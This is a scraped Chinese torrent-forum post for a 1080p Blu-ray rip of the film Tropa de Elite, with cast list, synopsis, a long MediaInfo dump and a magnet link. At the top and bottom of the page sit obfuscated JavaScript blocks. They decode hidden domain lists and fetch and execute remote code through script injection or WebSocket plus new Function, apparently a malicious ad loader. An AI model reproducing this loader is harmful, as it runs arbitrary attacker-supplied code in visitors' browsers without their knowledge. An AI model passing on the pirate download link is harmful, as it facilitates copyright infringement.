精英部队[中文字幕].Tropa.de.Elite.2007.1080p.BluRay.x265.10bit.DTS 6.44GB

版主小s 1月前 314

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 精英部队 / 精锐暴队(港) / 精锐部队 / 菁英部队 / The Elite Squad / Elite Squad

◎片 名 Tropa de Elite

◎年 代 2007

◎产 地 巴西 / 美国 / 阿根廷

◎类 别 剧情 / 动作 / 惊悚 / 犯罪

◎语 言 葡萄牙语

◎上映日期 2007-08-17(里约首映) / 2007-10-12(巴西)

◎IMDb链接 https://www.imdb.com/title/tt0861739/

◎豆瓣评分 8.0/10 (42479人评价)

◎豆瓣链接 https://movie.douban.com/subject/2284851/

◎片 长 115 分钟

◎导 演 何塞·帕迪里亚 José Padilha (id:1023090)

◎编 剧 布罗里欧·曼托伐尼 Bráulio Mantovani (id:1303763)

罗德里戈·皮门特尔 Rodrigo Pimentel (id:1305430)

约翰·凯林 John Kaylin (id:1241354)

André Batista André Batista (id:1311914)

Luiz Eduardo Soares Luiz Eduardo Soares (id:1311917)

何塞·帕迪里亚 José Padilha (id:1023090)

◎演 员 瓦格纳·马拉 Wagner Moura (id:1009708)

卡约·胡恩奎拉 Caio Junqueira (id:1112440)

安德烈·拉米罗 André Ramiro (id:1310864)

玛利亚·瑞贝罗 Maria Ribeiro (id:1041944)

费尔南达·马查多 Fernanda Machado (id:1172372)

Paulo Vilela Paulo Vilela (id:1347688)

娜塔莉亚·迪尔 Nathalia Dill (id:1266217)

Rod Carvalho (id:1265397)

米尔黑·考塔兹 Milhem Cortaz (id:1037469)

马赛罗·艾斯克莱尔 Marcelo Escorel (id:1090557)

苏纳·佩雷兹 Suzana Pires (id:1135458)

Cintia Rosa Cintia Rosa (id:1146678)

马塞罗·瓦列 Marcelo Valle (id:1151442)

费尔南达·弗雷塔斯 Fernanda de Freitas (id:1177394)

奥托 Otto Jr. (id:1211137)

罗贝塔·桑提亚哥 Roberta Santiago (id:1244900)

Bento Ribeiro (id:1261676)

塞尔莫·费尔南德斯 Thelmo Fernandes (id:1407946)

何塞·帕迪里亚 José Padilha (id:1023090)

马科斯·普拉多 Marcos Prado (id:1294833)

佩德罗·布罗夫曼 Pedro Bromfman (id:1006780)

卢拉·卡瓦略 Lula Carvalho (id:1280221)

丹尼尔·雷森德 Daniel Rezende (id:1304333)

Tulé Peak Tulé Peak (id:1294158)

Claudia Kopke Claudia Kopke (id:1288889)

马丁·马西亚斯 Martin Macias (id:1302154)

Malu Miranda Malu Miranda (id:1046537)

菲尔·尼尔森 Phil Neilson (id:1293013)

◎标 签 巴西 / 犯罪 / 动作 / 巴西电影 / 精锐部队 / 2007 / 暴力 / 剧情

◎简 介

号称世界上最危险的城市——巴西里约热内卢,警匪枪战时有发生。恶徒肆意横行,死亡如同家常便饭,甚至警匪沆瀣一气,危害城市。但就在这个混乱所在,却有一支刚正严明的部队横空出世。特别警察军事行动部队(Special Police Operation Battalion)凭借其果敢凶狠的办案作风而令匪徒闻风丧胆。

时1997年,教皇即将来此视察,高层要求纳斯西蒙(Wagner Moura 饰)所率领的这支精英部队在最短时间内肃清贫民窟内的毒品链。厌倦刀光血影的纳斯西蒙将心思放在了妻子和尚未出世的婴儿身上,他将任务交给了两个热血且充满理想的年青人——内图(Caio Junqueira 饰)和马提阿斯(André Ramiro 饰)。他们俩都不满警察队伍的腐败,决心在精英部队中大展身手……

本片荣获2008年柏林国际电影节金熊奖。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 148117301134296547483303648183910541001 (0x6F6E5AC406F0ADD25EF0290C743A26C9)

  4. Complete name : [email protected].mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.44 GiB

  8. Duration : 1 h 55 min

  9. Overall bit rate : 8 000 kb/s

  10. Encoded date : UTC 2021-10-26 05:03:41

  11. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : HEVC

  18. Format/Info : High Efficiency Video Coding

  19. Format profile : Main [email protected]@Main

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 1 h 55 min

  22. Bit rate : 6 363 kb/s

  23. Width : 1 920 pixels

  24. Height : 1 080 pixels

  25. Display aspect ratio : 16:9

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.128

  32. Stream size : 5.12 GiB (80%)

  33. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  34. Encoding settings : rc=crf / crf=22.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1080 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  35. Default : Yes

  36. Forced : No


  37. Audio

  38. ID : 2

  39. ID in the original source medium : 4352 (0x1100)

  40. Format : DTS

  41. Format/Info : Digital Theater Systems

  42. Codec ID : A_DTS

  43. Duration : 1 h 55 min

  44. Bit rate mode : Constant

  45. Bit rate : 1 509 kb/s

  46. Channel(s) : 6 channels

  47. Channel layout : C L R Ls Rs LFE

  48. Sampling rate : 48.0 kHz

  49. Frame rate : 93.750 FPS (512 SPF)

  50. Bit depth : 16 bits

  51. Compression mode : Lossy

  52. Stream size : 1.21 GiB (19%)

  53. Language : Portuguese

  54. Default : Yes

  55. Forced : No

  56. Original source medium : Blu-ray


  57. Text #1

  58. ID : 3

  59. ID in the original source medium : 4611 (0x1203)

  60. Format : PGS

  61. Muxing mode : zlib

  62. Codec ID : S_HDMV/PGS

  63. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  64. Duration : 1 h 49 min

  65. Bit rate : 50.6 kb/s

  66. Count of elements : 2561

  67. Stream size : 39.7 MiB (1%)

  68. Title : chs&eng

  69. Language : Chinese

  70. Default : Yes

  71. Forced : No

  72. Original source medium : Blu-ray


  73. Text #2

  74. ID : 4

  75. ID in the original source medium : 4612 (0x1204)

  76. Format : PGS

  77. Muxing mode : zlib

  78. Codec ID : S_HDMV/PGS

  79. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  80. Duration : 1 h 49 min

  81. Bit rate : 50.9 kb/s

  82. Count of elements : 2561

  83. Stream size : 40.0 MiB (1%)

  84. Title : cht&eng

  85. Language : Chinese

  86. Default : No

  87. Forced : No

  88. Original source medium : Blu-ray


  89. Text #3

  90. ID : 5

  91. ID in the original source medium : 4613 (0x1205)

  92. Format : PGS

  93. Muxing mode : zlib

  94. Codec ID : S_HDMV/PGS

  95. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  96. Duration : 1 h 49 min

  97. Bit rate : 26.6 kb/s

  98. Count of elements : 2561

  99. Stream size : 20.9 MiB (0%)

  100. Title : chs

  101. Language : Chinese

  102. Default : No

  103. Forced : No

  104. Original source medium : Blu-ray


  105. Text #4

  106. ID : 6

  107. ID in the original source medium : 4614 (0x1206)

  108. Format : PGS

  109. Muxing mode : zlib

  110. Codec ID : S_HDMV/PGS

  111. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  112. Duration : 1 h 49 min

  113. Bit rate : 26.9 kb/s

  114. Count of elements : 2561

  115. Stream size : 21.1 MiB (0%)

  116. Title : cht

  117. Language : Chinese

  118. Default : No

  119. Forced : No

  120. Original source medium : Blu-ray


  121. Text #5

  122. ID : 7

  123. ID in the original source medium : 4609 (0x1201)

  124. Format : PGS

  125. Muxing mode : zlib

  126. Codec ID : S_HDMV/PGS

  127. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  128. Duration : 1 h 47 min

  129. Bit rate : 47.0 kb/s

  130. Count of elements : 2918

  131. Stream size : 36.2 MiB (1%)

  132. Title : eng

  133. Language : English

  134. Default : No

  135. Forced : No

  136. Original source medium : Blu-ray


  137. Text #6

  138. ID : 8

  139. ID in the original source medium : 4608 (0x1200)

  140. Format : PGS

  141. Muxing mode : zlib

  142. Codec ID : S_HDMV/PGS

  143. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  144. Duration : 1 h 53 min

  145. Bit rate : 59.3 kb/s

  146. Count of elements : 3102

  147. Stream size : 47.9 MiB (1%)

  148. Title : por

  149. Language : Portuguese

  150. Default : No

  151. Forced : No

  152. Original source medium : Blu-ray


  153. Menu

  154. 00:00:00.000 : en:Chapter 01

  155. 00:08:42.522 : en:Chapter 02

  156. 00:16:24.984 : en:Chapter 03

  157. 00:25:32.531 : en:Chapter 04

  158. 00:30:43.842 : en:Chapter 05

  159. 00:38:05.283 : en:Chapter 06

  160. 00:46:55.813 : en:Chapter 07

  161. 00:55:49.346 : en:Chapter 08

  162. 01:00:57.654 : en:Chapter 09

  163. 01:06:06.963 : en:Chapter 10

  164. 01:10:55.251 : en:Chapter 11

  165. 01:14:59.495 : en:Chapter 12

  166. 01:22:20.852 : en:Chapter 13

  167. 01:29:45.380 : en:Chapter 14

  168. 01:36:00.755 : en:Chapter 15

  169. 01:39:38.973 : en:Chapter 16

  170. 01:45:10.304 : en:Chapter 17

  171. 01:50:34.628 : en:Chapter 18



TAGS 动作 剧情 惊悚 犯罪

磁力链:
  • magnet:?xt=urn:btih:52BCBFB9239E319EB6998D6AB71DB8358343B6BF

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};